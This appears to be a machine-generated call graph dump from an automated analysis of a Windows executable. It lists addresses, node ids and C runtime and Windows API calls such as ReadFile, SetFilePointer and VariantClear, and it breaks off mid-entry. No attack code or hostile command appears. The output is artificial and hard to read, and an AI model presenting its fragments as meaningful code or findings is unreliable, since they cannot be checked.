414ffa 85217->85218 85219 41500f 85217->85219 85710 417f77 46 API calls __getptd_noexit 85218->85710 85221 415471 __lock_file 47 API calls 85219->85221 85223 415017 85221->85223 85222 414fff 85711 417f25 10 API calls __write 85222->85711 85225 414e4e __ftell_nolock 51 API calls 85223->85225 85227 415024 85225->85227 85226 41500a __write 85226->85131 85712 41503d LeaveCriticalSection LeaveCriticalSection _fseek 85227->85712 85230 414dd6 85229->85230 85231 414deb 85229->85231 85238 417f77 46 API calls __getptd_noexit 85230->85238 85231->85230 85233 414df2 85231->85233 85236 414de6 85233->85236 85240 418f98 77 API calls 6 library calls 85233->85240 85234 414ddb 85239 417f25 10 API calls __write 85234->85239 85236->85183 85238->85234 85239->85236 85240->85236 85243 414910 __write 85241->85243 85242 414923 85297 417f77 46 API calls __getptd_noexit 85242->85297 85243->85242 85246 414951 85243->85246 85245 414928 85298 417f25 10 API calls __write 85245->85298 85260 41d4d1 85246->85260 85249 414956 85250 41496a 85249->85250 85251 41495d 85249->85251 85252 414992 85250->85252 85253 414972 85250->85253 85299 417f77 46 API calls __getptd_noexit 85251->85299 85277 41d218 85252->85277 85300 417f77 46 API calls __getptd_noexit 85253->85300 85257 414933 __write @_EH4_CallFilterFunc@8 85257->85187 85261 41d4dd __write 85260->85261 85262 4182cb __lock 46 API calls 85261->85262 85270 41d4eb 85262->85270 85263 41d560 85302 41d5fb 85263->85302 85264 41d567 85265 416b04 __malloc_crt 46 API calls 85264->85265 85267 41d56e 85265->85267 85267->85263 85269 41d57c InitializeCriticalSectionAndSpinCount 85267->85269 85268 41d5f0 __write 85268->85249 85271 41d59c 85269->85271 85272 41d5af EnterCriticalSection 85269->85272 85270->85263 85270->85264 85273 418209 __mtinitlocknum 46 API calls 85270->85273 85305 4154b2 47 API calls __lock 85270->85305 85306 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85270->85306 85275 413748 _free 46 API calls 85271->85275 85272->85263 85273->85270 85275->85263 85278 41d23a 85277->85278 85279 41d255 85278->85279 85290 41d26c __wopenfile 85278->85290 85311 417f77 46 API calls __getptd_noexit 85279->85311 85281 41d25a 85312 417f25 10 API calls __write 85281->85312 85283 41d47a 85316 417f77 46 API calls __getptd_noexit 85283->85316 85284 41d48c 85308 422bf9 85284->85308 85287 41d47f 85317 417f25 10 API calls __write 85287->85317 85288 41499d 85301 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 85288->85301 85290->85283 85296 41d421 85290->85296 85313 41341f 58 API calls 2 library calls 85290->85313 85292 41d41a 85292->85296 85314 41341f 58 API calls 2 library calls 85292->85314 85294 41d439 85294->85296 85315 41341f 58 API calls 2 library calls 85294->85315 85296->85283 85296->85284 85297->85245 85298->85257 85299->85257 85300->85257 85301->85257 85307 4181f2 LeaveCriticalSection 85302->85307 85304 41d602 85304->85268 85305->85270 85306->85270 85307->85304 85318 422b35 85308->85318 85310 422c14 85310->85288 85311->85281 85312->85288 85313->85292 85314->85294 85315->85296 85316->85287 85317->85288 85321 422b41 __write 85318->85321 85319 422b54 85320 417f77 __write 46 API calls 85319->85320 85322 422b59 85320->85322 85321->85319 85323 422b8a 85321->85323 85325 417f25 __write 10 API calls 85322->85325 85324 422400 __tsopen_nolock 109 API calls 85323->85324 85326 422ba4 85324->85326 85328 422b63 __write 85325->85328 85327 422bcb __wsopen_helper LeaveCriticalSection 85326->85327 85327->85328 85328->85310 85331 4150dd __write 85329->85331 85330 4150e9 85360 417f77 46 API calls __getptd_noexit 85330->85360 85331->85330 85332 41510f 85331->85332 85342 415471 85332->85342 85335 4150ee 85361 417f25 10 API calls __write 85335->85361 85341 4150f9 __write 85341->85189 85343 415483 85342->85343 85344 4154a5 EnterCriticalSection 85342->85344 85343->85344 85345 41548b 85343->85345 85346 415117 85344->85346 85347 4182cb __lock 46 API calls 85345->85347 85348 415047 85346->85348 85347->85346 85349 415067 85348->85349 85350 415057 85348->85350 85355 415079 85349->85355 85363 414e4e 85349->85363 85418 417f77 46 API calls __getptd_noexit 85350->85418 85354 41505c 85362 415143 LeaveCriticalSection LeaveCriticalSection _fseek 85354->85362 85380 41443c 85355->85380 85358 4150b9 85393 41e1f4 85358->85393 85360->85335 85361->85341 85362->85341 85364 414e61 85363->85364 85365 414e79 85363->85365 85419 417f77 46 API calls __getptd_noexit 85364->85419 85367 414139 __fflush_nolock 46 API calls 85365->85367 85369 414e80 85367->85369 85368 414e66 85420 417f25 10 API calls __write 85368->85420 85371 41e1f4 __write 51 API calls 85369->85371 85372 414e97 85371->85372 85373 414f09 85372->85373 85375 414ec9 85372->85375 85379 414e71 85372->85379 85421 417f77 46 API calls __getptd_noexit 85373->85421 85376 41e1f4 __write 51 API calls 85375->85376 85375->85379 85377 414f64 85376->85377 85378 41e1f4 __write 51 API calls 85377->85378 85377->85379 85378->85379 85379->85355 85381 414477 85380->85381 85382 414455 85380->85382 85386 414139 85381->85386 85382->85381 85383 414139 __fflush_nolock 46 API calls 85382->85383 85384 414470 85383->85384 85422 41b7b2 77 API calls 3 library calls 85384->85422 85387 414145 85386->85387 85388 41415a 85386->85388 85423 417f77 46 API calls __getptd_noexit 85387->85423 85388->85358 85390 41414a 85424 417f25 10 API calls __write 85390->85424 85392 414155 85392->85358 85394 41e200 __write 85393->85394 85395 41e223 85394->85395 85396 41e208 85394->85396 85398 41e22f 85395->85398 85402 41e269 85395->85402 85445 417f8a 46 API calls __getptd_noexit 85396->85445 85447 417f8a 46 API calls __getptd_noexit 85398->85447 85399 41e20d 85446 417f77 46 API calls __getptd_noexit 85399->85446 85401 41e234 85448 417f77 46 API calls __getptd_noexit 85401->85448 85425 41ae56 85402->85425 85406 41e215 __write 85406->85354 85407 41e23c 85449 417f25 10 API calls __write 85407->85449 85408 41e26f 85410 41e291 85408->85410 85411 41e27d 85408->85411 85450 417f77 46 API calls __getptd_noexit 85410->85450 85435 41e17f 85411->85435 85414 41e289 85452 41e2c0 LeaveCriticalSection __unlock_fhandle 85414->85452 85415 41e296 85451 417f8a 46 API calls __getptd_noexit 85415->85451 85418->85354 85419->85368 85420->85379 85421->85379 85422->85381 85423->85390 85424->85392 85426 41ae62 __write 85425->85426 85427 41aebc 85426->85427 85430 4182cb __lock 46 API calls 85426->85430 85428 41aec1 EnterCriticalSection 85427->85428 85429 41aede __write 85427->85429 85428->85429 85429->85408 85431 41ae8e 85430->85431 85432 41aeaa 85431->85432 85433 41ae97 InitializeCriticalSectionAndSpinCount 85431->85433 85434 41aeec ___lock_fhandle LeaveCriticalSection 85432->85434 85433->85432 85434->85427 85436 41aded __commit 46 API calls 85435->85436 85437 41e18e 85436->85437 85438 41e1a4 SetFilePointer 85437->85438 85439 41e194 85437->85439 85441 41e1bb GetLastError 85438->85441 85442 41e1c3 85438->85442 85440 417f77 __write 46 API calls 85439->85440 85443 41e199 85440->85443 85441->85442 85442->85443 85444 417f9d __dosmaperr 46 API calls 85442->85444 85443->85414 85444->85443 85445->85399 85446->85406 85447->85401 85448->85407 85449->85406 85450->85415 85451->85414 85452->85406 85454 4149ea 85453->85454 85455 4149fe 85453->85455 85499 417f77 46 API calls __getptd_noexit 85454->85499 85457 41443c __flush 77 API calls 85455->85457 85467 4149fa 85455->85467 85459 414a0a 85457->85459 85458 4149ef 85500 417f25 10 API calls __write 85458->85500 85472 41d8c2 85459->85472 85463 414139 __fflush_nolock 46 API calls 85464 414a18 85463->85464 85476 41d7fe 85464->85476 85466 414a1e 85466->85467 85468 413748 _free 46 API calls 85466->85468 85471 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 85467->85471 85468->85467 85469->85203 85470->85206 85471->85206 85473 414a12 85472->85473 85474 41d8d2 85472->85474 85473->85463 85474->85473 85475 413748 _free 46 API calls 85474->85475 85475->85473 85477 41d80a __write 85476->85477 85478 41d812 85477->85478 85479 41d82d 85477->85479 85516 417f8a 46 API calls __getptd_noexit 85478->85516 85481 41d839 85479->85481 85486 41d873 85479->85486 85518 417f8a 46 API calls __getptd_noexit 85481->85518 85482 41d817 85517 417f77 46 API calls __getptd_noexit 85482->85517 85485 41d83e 85519 417f77 46 API calls __getptd_noexit 85485->85519 85487 41ae56 ___lock_fhandle 48 API calls 85486->85487 85489 41d879 85487->85489 85491 41d893 85489->85491 85492 41d887 85489->85492 85490 41d846 85520 417f25 10 API calls __write 85490->85520 85521 417f77 46 API calls __getptd_noexit 85491->85521 85501 41d762 85492->85501 85496 41d81f __write 85496->85466 85497 41d88d 85522 41d8ba LeaveCriticalSection __unlock_fhandle 85497->85522 85499->85458 85500->85467 85523 41aded 85501->85523 85503 41d7c8 85536 41ad67 47 API calls __write 85503->85536 85504 41d772 85504->85503 85505 41d7a6 85504->85505 85507 41aded __commit 46 API calls 85504->85507 85505->85503 85508 41aded __commit 46 API calls 85505->85508 85510 41d79d 85507->85510 85511 41d7b2 CloseHandle 85508->85511 85509 41d7d0 85512 41d7f2 85509->85512 85537 417f9d 46 API calls 2 library calls 85509->85537 85514 41aded __commit 46 API calls 85510->85514 85511->85503 85515 41d7be GetLastError 85511->85515 85512->85497 85514->85505 85515->85503 85516->85482 85517->85496 85518->85485 85519->85490 85520->85496 85521->85497 85522->85496 85524 41ae12 85523->85524 85525 41adfa 85523->85525 85528 417f8a __write 46 API calls 85524->85528 85529 41ae51 85524->85529 85526 417f8a __write 46 API calls 85525->85526 85527 41adff 85526->85527 85530 417f77 __write 46 API calls 85527->85530 85531 41ae23 85528->85531 85529->85504 85532 41ae07 85530->85532 85533 417f77 __write 46 API calls 85531->85533 85532->85504 85534 41ae2b 85533->85534 85535 417f25 __write 10 API calls 85534->85535 85535->85532 85536->85509 85537->85512 85539 414c82 __write 85538->85539 85540 414cc3 85539->85540 85541 414c96 setSBUpLow 85539->85541 85542 414cbb __write 85539->85542 85543 415471 __lock_file 47 API calls 85540->85543 85565 417f77 46 API calls __getptd_noexit 85541->85565 85542->85212 85544 414ccb 85543->85544 85551 414aba 85544->85551 85547 414cb0 85566 417f25 10 API calls __write 85547->85566 85552 414af2 85551->85552 85556 414ad8 setSBUpLow 85551->85556 85567 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 85552->85567 85553 414ae2 85618 417f77 46 API calls __getptd_noexit 85553->85618 85555 414ae7 85619 417f25 10 API calls __write 85555->85619 85556->85552 85556->85553 85562 414b2d 85556->85562 85559 414c38 setSBUpLow 85621 417f77 46 API calls __getptd_noexit 85559->85621 85561 414139 __fflush_nolock 46 API calls 85561->85562 85562->85552 85562->85559 85562->85561 85568 41dfcc 85562->85568 85598 41d8f3 85562->85598 85620 41e0c2 46 API calls 3 library calls 85562->85620 85565->85547 85566->85542 85567->85542 85569 41dfd8 __write 85568->85569 85570 41dfe0 85569->85570 85571 41dffb 85569->85571 85691 417f8a 46 API calls __getptd_noexit 85570->85691 85573 41e007 85571->85573 85576 41e041 85571->85576 85693 417f8a 46 API calls __getptd_noexit 85573->85693 85574 41dfe5 85692 417f77 46 API calls __getptd_noexit 85574->85692 85580 41e063 85576->85580 85581 41e04e 85576->85581 85578 41e00c 85694 417f77 46 API calls __getptd_noexit 85578->85694 85583 41ae56 ___lock_fhandle 48 API calls 85580->85583 85696 417f8a 46 API calls __getptd_noexit 85581->85696 85585 41e069 85583->85585 85584 41e053 85697 417f77 46 API calls __getptd_noexit 85584->85697 85588 41e077 85585->85588 85589 41e08b 85585->85589 85622 41da15 85588->85622 85698 417f77 46 API calls __getptd_noexit 85589->85698 85592 41e014 85695 417f25 10 API calls __write 85592->85695 85593 41e083 85700 41e0ba LeaveCriticalSection __unlock_fhandle 85593->85700 85594 41e090 85699 417f8a 46 API calls __getptd_noexit 85594->85699 85597 41dfed __write 85597->85562 85599 41d900 85598->85599 85603 41d915 85598->85603 85704 417f77 46 API calls __getptd_noexit 85599->85704 85601 41d905 85705 417f25 10 API calls __write 85601->85705 85604 41d94a 85603->85604 85609 41d910 85603->85609 85701 420603 85603->85701 85606 414139 __fflush_nolock 46 API calls 85604->85606 85607 41d95e 85606->85607 85608 41dfcc __read 59 API calls 85607->85608 85610 41d965 85608->85610 85609->85562 85610->85609 85611 414139 __fflush_nolock 46 API calls 85610->85611 85612 41d988 85611->85612 85612->85609 85613 414139 __fflush_nolock 46 API calls 85612->85613 85614 41d994 85613->85614 85614->85609 85615 414139 __fflush_nolock 46 API calls 85614->85615 85616 41d9a1 85615->85616 85617 414139 __fflush_nolock 46 API calls 85616->85617 85617->85609 85618->85555 85619->85552 85620->85562 85621->85555 85623 41da31 85622->85623 85624 41da4c 85622->85624 85625 417f8a __write 46 API calls 85623->85625 85626 41da5b 85624->85626 85627 41da7a 85624->85627 85629 41da36 85625->85629 85628 417f8a __write 46 API calls 85626->85628 85631 41da98 85627->85631 85642 41daac 85627->85642 85630 41da60 85628->85630 85632 417f77 __write 46 API calls 85629->85632 85633 417f77 __write 46 API calls 85630->85633 85634 417f8a __write 46 API calls 85631->85634 85643 41da3e 85632->85643 85636 41da67 85633->85636 85638 41da9d 85634->85638 85635 41db02 85637 417f8a __write 46 API calls 85635->85637 85639 417f25 __write 10 API calls 85636->85639 85640 41db07 85637->85640 85641 417f77 __write 46 API calls 85638->85641 85639->85643 85644 417f77 __write 46 API calls 85640->85644 85645 41daa4 85641->85645 85642->85635 85642->85643 85646 41dae1 85642->85646 85648 41db1b 85642->85648 85643->85593 85644->85645 85649 417f25 __write 10 API calls 85645->85649 85646->85635 85647 41daec ReadFile 85646->85647 85653 41dc17 85647->85653 85654 41df8f GetLastError 85647->85654 85650 416b04 __malloc_crt 46 API calls 85648->85650 85649->85643 85652 41db31 85650->85652 85657 41db59 85652->85657 85658 41db3b 85652->85658 85653->85654 85661 41dc2b 85653->85661 85655 41de16 85654->85655 85656 41df9c 85654->85656 85665 417f9d __dosmaperr 46 API calls 85655->85665 85686 41dd9b 85655->85686 85659 417f77 __write 46 API calls 85656->85659 85662 420494 __lseeki64_nolock 48 API calls 85657->85662 85660 417f77 __write 46 API calls 85658->85660 85663 41dfa1 85659->85663 85664 41db40 85660->85664 85672 41de5b 85661->85672 85678 41dc47 85661->85678 85661->85686 85666 41db67 85662->85666 85667 417f8a __write 46 API calls 85663->85667 85668 417f8a __write 46 API calls 85664->85668 85665->85686 85666->85647 85667->85686 85668->85643 85669 413748 _free 46 API calls 85669->85643 85670 41dcab ReadFile 85674 41dcc9 GetLastError 85670->85674 85681 41dcd3 85670->85681 85671 41ded0 ReadFile 85675 41deef GetLastError 85671->85675 85682 41def9 85671->85682 85672->85671 85672->85686 85673 41dd28 85679 41dda3 85673->85679 85680 41dd96 85673->85680 85673->85686 85687 41dd60 85673->85687 85674->85678 85674->85681 85675->85672 85675->85682 85676 41ddec MultiByteToWideChar 85677 41de10 GetLastError 85676->85677 85676->85686 85677->85655 85678->85670 85678->85673 85679->85687 85688 41ddda 85679->85688 85683 417f77 __write 46 API calls 85680->85683 85681->85678 85684 420494 __lseeki64_nolock 48 API calls 85681->85684 85682->85672 85685 420494 __lseeki64_nolock 48 API calls 85682->85685 85683->85686 85684->85681 85685->85682 85686->85643 85686->85669 85687->85676 85689 420494 __lseeki64_nolock 48 API calls 85688->85689 85690 41dde9 85689->85690 85690->85676 85691->85574 85692->85597 85693->85578 85694->85592 85695->85597 85696->85584 85697->85592 85698->85594 85699->85593 85700->85597 85702 416b04 __malloc_crt 46 API calls 85701->85702 85703 420618 85702->85703 85703->85604 85704->85601 85705->85609 85709 4148b3 GetSystemTimeAsFileTime __aulldiv 85706->85709 85708 442c6b 85708->85215 85709->85708 85710->85222 85711->85226 85712->85226 85716 45272f __tzset_nolock _wcscpy 85713->85716 85714 44afef GetSystemTimeAsFileTime 85714->85716 85715 4528a4 85715->85137 85715->85138 85716->85714 85716->85715 85717 414d04 61 API calls __fread_nolock 85716->85717 85718 4150d1 81 API calls _fseek 85716->85718 85717->85716 85718->85716 85720 44b1bc 85719->85720 85721 44b1ca 85719->85721 85722 4149c2 116 API calls 85720->85722 85723 44b1e1 85721->85723 85724 4149c2 116 API calls 85721->85724 85725 44b1d8 85721->85725 85722->85721 85754 4321a4 85723->85754 85726 44b2db 85724->85726 85725->85165 85726->85723 85729 44b2e9 85726->85729 85728 44b224 85730 44b253 85728->85730 85731 44b228 85728->85731 85732 44b2f6 85729->85732 85734 414a46 __fcloseall 82 API calls 85729->85734 85758 43213d 85730->85758 85733 44b235 85731->85733 85736 414a46 __fcloseall 82 API calls 85731->85736 85732->85165 85737 44b245 85733->85737 85739 414a46 __fcloseall 82 API calls 85733->85739 85734->85732 85736->85733 85737->85165 85738 44b25a 85740 44b260 85738->85740 85741 44b289 85738->85741 85739->85737 85743 44b26d 85740->85743 85745 414a46 __fcloseall 82 API calls 85740->85745 85768 44b0bf 87 API calls 85741->85768 85746 414a46 __fcloseall 82 API calls 85743->85746 85748 44b27d 85743->85748 85744 44b28f 85769 4320f8 46 API calls _free 85744->85769 85745->85743 85746->85748 85748->85165 85749 44b295 85750 44b2a2 85749->85750 85751 414a46 __fcloseall 82 API calls 85749->85751 85752 44b2b2 85750->85752 85753 414a46 __fcloseall 82 API calls 85750->85753 85751->85750 85752->85165 85753->85752 85755 4321cb 85754->85755 85757 4321b4 __tzset_nolock _memmove 85754->85757 85756 414d04 __fread_nolock 61 API calls 85755->85756 85756->85757 85757->85728 85759 4135bb _malloc 46 API calls 85758->85759 85760 432150 85759->85760 85761 4135bb _malloc 46 API calls 85760->85761 85762 432162 85761->85762 85763 4135bb _malloc 46 API calls 85762->85763 85764 432174 85763->85764 85766 432189 85764->85766 85770 4320f8 46 API calls _free 85764->85770 85766->85738 85767 432198 85767->85738 85768->85744 85769->85749 85770->85767 85771->85067 85772->85069 85773->85087 85774->85087 85775->85087 85776->85081 85777->85087 85778->85087 85779->85093 85780->85101 85781->85103 85782->85103 85832 410160 85783->85832 85785 41012f GetFullPathNameW 85786 410147 ctype 85785->85786 85786->84923 85788 4102cb SHGetDesktopFolder 85787->85788 85791 410333 _wcsncpy 85787->85791 85789 4102e0 _wcsncpy 85788->85789 85788->85791 85790 41031c SHGetPathFromIDListW 85789->85790 85789->85791 85790->85791 85791->84926 85793 4101bb 85792->85793 85797 425f4a 85792->85797 85794 410160 52 API calls 85793->85794 85795 4101c7 85794->85795 85836 410200 52 API calls 2 library calls 85795->85836 85796 4114ab __wcsicoll 58 API calls 85796->85797 85797->85796 85799 425f6e 85797->85799 85799->84928 85800 4101d6 85837 410200 52 API calls 2 library calls 85800->85837 85802 4101e9 85802->84928 85804 40f760 126 API calls 85803->85804 85805 40f584 85804->85805 85806 429335 85805->85806 85807 40f58c 85805->85807 85808 4528bd 118 API calls 85806->85808 85809 40f598 85807->85809 85810 429358 85807->85810 85811 42934b 85808->85811 85855 4033c0 113 API calls 7 library calls 85809->85855 85856 434034 86 API calls _wprintf 85810->85856 85814 429373 85811->85814 85815 42934f 85811->85815 85819 4115d7 52 API calls 85814->85819 85818 431e58 82 API calls 85815->85818 85816 429369 85816->85814 85817 40f5b4 85817->84924 85818->85810 85831 4293c5 ctype 85819->85831 85820 42959c 85821 413748 _free 46 API calls 85820->85821 85822 4295a5 85821->85822 85823 431e58 82 API calls 85822->85823 85824 4295b1 85823->85824 85828 401b10 52 API calls 85828->85831 85831->85820 85831->85828 85838 444af8 85831->85838 85841 402780 85831->85841 85849 4022d0 85831->85849 85857 44c7dd 64 API calls 3 library calls 85831->85857 85858 44b41c 52 API calls 85831->85858 85833 410167 _wcslen 85832->85833 85834 4115d7 52 API calls 85833->85834 85835 41017e _wcscpy 85834->85835 85835->85785 85836->85800 85837->85802 85839 4115d7 52 API calls 85838->85839 85840 444b27 _memmove 85839->85840 85840->85831 85842 402827 85841->85842 85847 402790 ctype _memmove 85841->85847 85844 4115d7 52 API calls 85842->85844 85843 4115d7 52 API calls 85845 402797 85843->85845 85844->85847 85846 4115d7 52 API calls 85845->85846 85848 4027bd 85845->85848 85846->85848 85847->85843 85848->85831 85850 4022e0 85849->85850 85852 40239d 85849->85852 85851 4115d7 52 API calls 85850->85851 85850->85852 85854 402320 ctype 85850->85854 85851->85854 85852->85831 85853 4115d7 52 API calls 85853->85854 85854->85852 85854->85853 85855->85817 85856->85816 85857->85831 85858->85831 85860 402417 85859->85860 85861 402539 ctype 85859->85861 85860->85861 85862 4115d7 52 API calls 85860->85862 85861->84932 85863 402443 85862->85863 85864 4115d7 52 API calls 85863->85864 85865 4024b4 85864->85865 85865->85861 85867 4022d0 52 API calls 85865->85867 85888 402880 95 API calls 2 library calls 85865->85888 85867->85865 85873 401566 85868->85873 85869 401794 85889 40e9a0 90 API calls 85869->85889 85872 4010a0 52 API calls 85872->85873 85873->85869 85873->85872 85875 40167a 85873->85875 85874 4017c0 85874->84934 85875->85874 85890 45e737 90 API calls 3 library calls 85875->85890 85877 40bc70 52 API calls 85876->85877 85886 40d451 85877->85886 85878 40d50f 85893 410600 52 API calls 85878->85893 85880 427c01 85894 45e737 90 API calls 3 library calls 85880->85894 85881 40e0a0 52 API calls 85881->85886 85883 40d519 85883->84937 85884 401b10 52 API calls 85884->85886 85886->85878 85886->85880 85886->85881 85886->85883 85886->85884 85891 40f310 53 API calls 85886->85891 85892 40d860 91 API calls 85886->85892 85888->85865 85889->85875 85890->85874 85891->85886 85892->85886 85893->85883 85894->85883 85895->84950 85896->84951 85898 42c5fe 85897->85898 85950 4091c6 85897->85950 85899 40bc70 52 API calls 85898->85899 85898->85950 85900 42c64e InterlockedIncrement 85899->85900 85901 42c665 85900->85901 85906 42c697 85900->85906 85903 42c672 InterlockedDecrement Sleep InterlockedIncrement 85901->85903 85901->85906 85902 42c737 InterlockedDecrement 85904 42c74a 85902->85904 85903->85901 85903->85906 85907 408f40 VariantClear 85904->85907 85905 42c731 85905->85902 85906->85902 85906->85905 86190 408e80 85906->86190 85909 42c752 85907->85909 86199 410c60 VariantClear ctype 85909->86199 85913 42c6db 85914 402160 52 API calls 85913->85914 85915 42c6e5 85914->85915 86195 45340c 85 API calls 85915->86195 85917 42c6f1 86196 40d200 52 API calls 2 library calls 85917->86196 85919 42c6fb 86197 465124 53 API calls 85919->86197 85921 42c715 85922 42c76a 85921->85922 85923 42c719 85921->85923 85924 401b10 52 API calls 85922->85924 86198 46fe32 VariantClear 85923->86198 85926 42c77e 85924->85926 85927 401980 53 API calls 85926->85927 85933 42c796 85927->85933 85928 42c812 86201 46fe32 VariantClear 85928->86201 85930 42c82a InterlockedDecrement 86202 46ff07 54 API calls 85930->86202 85932 42c864 86203 45e737 90 API calls 3 library calls 85932->86203 85933->85928 85933->85932 86200 40ba10 52 API calls 2 library calls 85933->86200 85936 42c9ec 86246 47d33e 331 API calls 85936->86246 85938 42c9fe 86247 46feb1 VariantClear VariantClear 85938->86247 85940 42ca08 85943 401b10 52 API calls 85940->85943 85941 408f40 VariantClear 85951 42c849 85941->85951 85942 402780 52 API calls 85942->85951 85945 42ca15 85943->85945 85944 408f40 VariantClear 85946 42c891 85944->85946 85947 40c2c0 52 API calls 85945->85947 86204 410c60 VariantClear ctype 85946->86204 85952 42c874 85947->85952 85949 401980 53 API calls 85949->85951 85950->85014 85951->85936 85951->85941 85951->85942 85951->85949 86205 40a780 85951->86205 85952->85944 85954 42ca59 85952->85954 85954->85954 85956 40afc4 85955->85956 85957 40b156 85955->85957 85958 40afd5 85956->85958 85959 42d1e3 85956->85959 86257 45e737 90 API calls 3 library calls 85957->86257 85963 40a780 194 API calls 85958->85963 85978 40b11a ctype 85958->85978 86258 45e737 90 API calls 3 library calls 85959->86258 85962 42d1f8 85968 408f40 VariantClear 85962->85968 85966 40b00a 85963->85966 85964 40b143 85964->85014 85966->85962 85969 40b012 85966->85969 85967 42d4db 85967->85967 85968->85964 85970 40b04a 85969->85970 85971 42d231 VariantClear 85969->85971 85972 40b094 ctype 85969->85972 85979 40b05c ctype 85970->85979 86259 40e270 VariantClear ctype 85970->86259 85971->85979 85973 40b108 85972->85973 85975 42d425 ctype 85972->85975 85973->85978 86260 40e270 VariantClear ctype 85973->86260 85974 42d45a VariantClear 85974->85978 85975->85974 85975->85978 85977 4115d7 52 API calls 85977->85972 85978->85964 86261 45e737 90 API calls 3 library calls 85978->86261 85979->85972 85979->85977 85982 408fff 85981->85982 86000 40900d 85981->86000 86262 403ea0 52 API calls __cinit 85982->86262 85985 42c3f6 86265 45e737 90 API calls 3 library calls 85985->86265 85987 42c44a 86267 45e737 90 API calls 3 library calls 85987->86267 85988 40a780 194 API calls 85988->86000 85989 42c47b 86268 451b42 61 API calls 85989->86268 85993 42c4cb 86270 47faae 233 API calls 85993->86270 85994 42c564 85995 408f40 VariantClear 85994->85995 86015 4090f2 ctype 85995->86015 85996 42c491 85996->86015 86269 45e737 90 API calls 3 library calls 85996->86269 85998 42c548 86273 45e737 90 API calls 3 library calls 85998->86273 85999 409112 85999->85998 86010 40912b 85999->86010 86000->85985 86000->85987 86000->85988 86000->85989 86000->85993 86000->85994 86000->85998 86000->85999 86003 4090df 86000->86003 86005 42c528 86000->86005 86007 4090ea 86000->86007 86000->86015 86264 4534e3 52 API calls 86000->86264 86266 40c4e0 194 API calls 86000->86266 86001 42c4da 86001->86015 86271 45e737 90 API calls 3 library calls 86001->86271 86003->86007 86008 408e80 VariantClear 86003->86008 86272 45e737 90 API calls 3 library calls 86005->86272 86011 408f40 VariantClear 86007->86011 86008->86007 86010->86015 86263 403e10 53 API calls 86010->86263 86011->86015 86013 40914b 86014 408f40 VariantClear 86013->86014 86014->86015 86015->85014 86274 408d90 86016->86274 86018 429778 86302 410c60 VariantClear ctype 86018->86302 86020 429780 86021 408cf9 86021->86018 86022 42976c 86021->86022 86024 408d2d 86021->86024 86301 45e737 90 API calls 3 library calls 86022->86301 86290 403d10 86024->86290 86027 408d71 ctype 86027->85014 86028 408f40 VariantClear 86029 408d45 ctype 86028->86029 86029->86027 86029->86028 86031 425c87 86030->86031 86034 40d15f 86030->86034 86032 425cc7 86031->86032 86033 425ca1 TranslateAcceleratorW 86031->86033 86033->86034 86034->85014 86036 42602f 86035->86036 86038 40d17f 86035->86038 86036->85014 86037 42608e IsDialogMessageW 86037->86038 86039 40d18c 86037->86039 86038->86037 86038->86039 86581 430c46 GetClassLongW 86038->86581 86039->85014 86042 4096c6 _wcslen 86041->86042 86043 4115d7 52 API calls 86042->86043 86106 40a70c ctype _memmove 86042->86106 86044 4096fa _memmove 86043->86044 86045 4115d7 52 API calls 86044->86045 86047 40971b 86045->86047 86046 4013a0 52 API calls 86048 4297aa 86046->86048 86050 409749 CharUpperBuffW 86047->86050 86052 40976a ctype 86047->86052 86047->86106 86049 4115d7 52 API calls 86048->86049 86093 4297d1 _memmove 86049->86093 86050->86052 86102 4097e5 ctype 86052->86102 86583 47dcbb 196 API calls 86052->86583 86054 42a452 86055 408f40 VariantClear 86054->86055 86056 42ae92 86055->86056 86610 410c60 VariantClear ctype 86056->86610 86058 42aea4 86059 409aa2 86061 4115d7 52 API calls 86059->86061 86066 409afe 86059->86066 86059->86093 86060 40a689 86063 4115d7 52 API calls 86060->86063 86061->86066 86062 4115d7 52 API calls 86062->86102 86080 40a6af ctype _memmove 86063->86080 86064 409b2a 86068 429dbe 86064->86068 86129 409b4d ctype _memmove 86064->86129 86591 40b400 VariantClear VariantClear ctype 86064->86591 86065 40c2c0 52 API calls 86065->86102 86066->86064 86067 4115d7 52 API calls 86066->86067 86069 429d31 86067->86069 86073 429dd3 86068->86073 86592 40b400 VariantClear VariantClear ctype 86068->86592 86072 429d42 86069->86072 86588 44a801 52 API calls 86069->86588 86070 409fd2 86078 40a045 86070->86078 86130 42a3f5 86070->86130 86084 40e0a0 52 API calls 86072->86084 86073->86129 86593 40e1c0 VariantClear ctype 86073->86593 86074 429a46 VariantClear 86074->86102 86075 408f40 VariantClear 86075->86102 86082 4115d7 52 API calls 86078->86082 86088 4115d7 52 API calls 86080->86088 86089 40a04c 86082->86089 86090 429d57 86084->86090 86086 42a42f 86597 45e737 90 API calls 3 library calls 86086->86597 86088->86106 86091 40a0a7 86089->86091 86095 4091e0 317 API calls 86089->86095 86589 453443 52 API calls 86090->86589 86113 40a0af 86091->86113 86598 40c790 VariantClear ctype 86091->86598 86092 4299d9 86096 408f40 VariantClear 86092->86096 86609 45e737 90 API calls 3 library calls 86093->86609 86095->86091 86101 4299e2 86096->86101 86097 429abd 86097->85014 86098 429d88 86590 453443 52 API calls 86098->86590 86585 410c60 VariantClear ctype 86101->86585 86102->86054 86102->86059 86102->86060 86102->86062 86102->86065 86102->86074 86102->86075 86102->86080 86102->86092 86102->86093 86102->86097 86108 40a780 194 API calls 86102->86108 86584 40c4e0 194 API calls 86102->86584 86586 40ba10 52 API calls 2 library calls 86102->86586 86587 40e270 VariantClear ctype 86102->86587 86104 402780 52 API calls 86104->86129 86106->86046 86108->86102 86109 4115d7 52 API calls 86109->86129 86111 408f40 VariantClear 86142 40a162 ctype _memmove 86111->86142 86112 41130a 51 API calls __cinit 86112->86129 86114 40a11b 86113->86114 86116 42a4b4 VariantClear 86113->86116 86113->86142 86121 40a12d ctype 86114->86121 86599 40e270 VariantClear ctype 86114->86599 86115 40a780 194 API calls 86115->86129 86116->86121 86118 401980 53 API calls 86118->86129 86119 408e80 VariantClear 86119->86129 86120 4115d7 52 API calls 86120->86142 86121->86120 86121->86142 86122 408e80 VariantClear 86122->86142 86124 44a801 52 API calls 86124->86129 86125 42a74d VariantClear 86125->86142 86126 40a368 86128 42aad4 86126->86128 86136 40a397 86126->86136 86127 40e270 VariantClear 86127->86142 86602 46fe90 VariantClear VariantClear ctype 86128->86602 86129->86070 86129->86086 86129->86104 86129->86106 86129->86109 86129->86112 86129->86115 86129->86118 86129->86119 86129->86124 86129->86130 86133 409c95 86129->86133 86594 45f508 52 API calls 86129->86594 86595 403e10 53 API 